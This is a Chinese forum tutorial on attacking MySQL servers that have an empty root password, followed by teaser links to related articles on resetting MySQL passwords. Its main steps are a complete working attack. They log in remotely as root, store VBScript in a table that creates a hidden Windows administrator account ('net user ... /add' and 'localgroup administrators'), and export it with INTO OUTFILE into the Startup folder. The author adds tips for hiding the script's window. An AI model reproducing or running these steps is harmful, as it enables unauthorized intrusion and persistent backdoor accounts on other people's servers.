這篇論壇文章(賽迪網技術社區)著重介紹了MySQL數據庫用戶root密碼爲空的另類攻擊方法,更多內容請參考下文:
1、連接到對方mysql 服務器
mysql -u root -h 192.168.0.1
mysql.exe 這個程序在你安裝了mysql的的bin目錄中
2、讓我們來看看服務器中有些什麽數據庫
mysql>show databases;
mysql默認安裝時會有mysql、test這兩個數據庫,如果你看到有其它的數據庫那麽就是用戶自建的數據庫。
3、讓我們進入數據庫
mysql>use test;
我們將會進入test數據庫中
4、查看我們進入數據庫中有些什麽數據表
mysql>show tables;
默認的情況下,test中沒有任何表的存在。
以下爲關鍵的部分
5、在test數據庫下創建一個新的表;
mysql>create table a (cmd text);
好了,我們創建了一個新的表,表名爲a,表中只存放一個字段,字段名爲cmd,爲text文本。
6、在表中插入內容
mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user zjl317 zjl317 /add""0) " );
mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators zjl317 /add""0) " );
注意雙引號和括號以及後面的“0”一定要輸入!我們將用這三條命令來建立一個vbs的腳本程序!
7、好了,現在我們來看看表a中有些什麽
mysql>select * from a;
我們將會看到表中有三行數據,就是我們剛剛輸入的內容,確認你輸入的內容無誤後,我們來到下一步
8、輸出表爲一個vbs的腳本文件
mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\「開始」菜單\\程序\\啓動\a.vbs";
我們把我們表中的內容輸入到啓動組中,是一個vbs的腳本文件!注意“\"符號。
9、看到這大家肯定知道了,就是利用mysql輸出一個可執行的文件而已。爲什麽不用bat呢,因爲啓動運行時會有明顯的dos窗口出來,而用vbs腳本則可以完全隱藏窗口且不會有錯誤提示!本來,應該還有一句完成腳本後自動刪除此腳本的,但是中文目錄實在無法處理,只有作罷!
MYSQL用戶root密碼爲弱口令又一攻擊方法 一般就是寫一個ASP或PHP的後門,不僅很麻煩,而且還要猜解網站的目錄,如果對方沒有開IIS,那我們豈不沒辦法了?? 後來,自己思索想到一個辦法,在我測試的幾台有此漏洞的機中均獲得了成功,現將我的攻...查看完整版>>
MYSQL用戶root密碼爲弱口令又一攻擊方法
MYSQL用戶root密碼爲弱口令又一攻擊方法 般就是寫一個ASP或PHP的後門,不僅很麻煩,而且還要猜解網站的目錄,如果對方沒有開IIS,那我們豈不沒辦法了?? 後來,自己思索想到一個辦法,在我測試的幾台有此漏洞的機中均獲得了成功,現將我的攻擊方法公...查看完整版>>
MYSQL用戶root密碼爲弱口令又一攻擊方法
講解幾種破解MySQL數據庫root密碼的方法幾種破解mysql root密碼的幾種方法: 方法一 使用phpmyadmin,這是最簡單的了,修改mysql庫的user表,不過別忘了使用PASSWORD函數。 方法二 使用mysqladmin,這是前面聲明的一個特例。 mysqladmin -u root -p passwor...查看完整版>>
講解幾種破解MySQL數據庫root密碼的方法
忘記了 MySQL 的 root 密碼如果忘記了 MySQL 的 root 密碼,可以用以下方法重新設置: 1. KILL掉系統裏的MySQL進程; 2. 用以下命令啓動MySQL,以不檢查權限的方式啓動; mysqld_safe -skip-grant-tables & 3. 然後用空密碼方...查看完整版>>
忘記了 MySQL 的 root 密碼
講解更改MySQL數據庫root密碼的具體方法第一種︰使用 set password語法 shell> mysql -u root mysql mysql> SET PASSWORD FOR root=PASSWORD(’new_password’); 第二種︰使用 mysqladmin命令 shell>mysqladmin -u root password new_password 如...查看完整版>>
講解更改MySQL數據庫root密碼的具體方法
擊斃遺忘的mysql-root密碼 前天錢包被偷,除了直接的經濟損失以外,還有一點重要的是我剛配好的一台服務器的root密碼跟mysql的root密碼丟了。(之前爲了安全著想。我自己寫了個隨機算法生成了一個超長口令。。結果。。可想而知了。。自己記...查看完整版>>
擊斃遺忘的mysql-root密碼
Windows 系統用戶擺脫黑客攻擊方法介紹上網的時候,經常會發現自己的網絡防火牆在不停的發出警報,專家告訴你這就有可能是遭遇了黑客的攻擊。那有什麽辦法來擺脫這些不請自來的黑客麽? 一、取消文件夾隱藏共享 如果你使用了Windows 2000/XP系統,右鍵單擊...查看完整版>>
Windows 系統用戶擺脫黑客攻擊方法介紹
Windows系統用戶擺脫黑客攻擊的方法 上網的時候,經常會發現自己的網絡防火牆在不停的發出警報,專家告訴你這就有可能是遭遇了黑客的攻擊。那有什麽辦法來擺脫這些不請自來的黑客麽? 一、取消文件夾隱藏共享 如果你使用了Windows 2000/XP系統...查看完整版>>
Windows系統用戶擺脫黑客攻擊的方法
MySQL根用戶root密碼忘記後的處理方法MySQL根用戶root密碼忘記後的處理方法: Windows平台下的步驟 1.以管理員的身份登錄到windows系統 2.用windows服務管理工具或任務管理器來停止MySQL服務 3.建立一個單行的文本文件,保存爲c:\mysql\pwdhf.txt, 內容是...查看完整版>>
MySQL根用戶root密碼忘記後的處理方法